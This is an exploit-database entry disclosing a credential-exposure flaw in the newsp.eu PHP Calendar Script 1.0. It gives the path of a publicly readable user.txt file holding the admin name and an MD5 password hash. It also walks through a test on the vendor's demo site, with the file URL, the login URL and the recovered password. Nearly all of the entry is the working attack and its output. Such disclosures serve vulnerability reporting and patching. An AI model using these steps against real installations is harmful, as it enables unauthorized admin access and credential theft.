newsp.eu PHP Calendar Script 1.0 - User Credentials Disclosure

EDB-ID:

40127

CVE:

N/A




Platform:

PHP

Date:

2016-07-19


# Exploit Title: PHP calendar script Password Download File
# Date: 2016-07-18
# Exploit Author: Meisam Monsef meisamrce@yahoo.com or meisamrce@gmail.com
# Vendor Homepage: http://www.newsp.eu/calendarscript.php?pt=st
# Version: All Version
# Download Link : http://www.newsp.eu/calendar.zip

Exploit :
http://site/user.txt
Admin|fe01ce2a7fbac8fafaed7c982a04e229
Password Hash = fe01ce2a7fbac8fafaed7c982a04e229 (demo)[MD5]

Test :
Exploit : http://www.newsp.eu/demo/user.txt
Login Url : http://www.newsp.eu/demo/login.php
Password : demo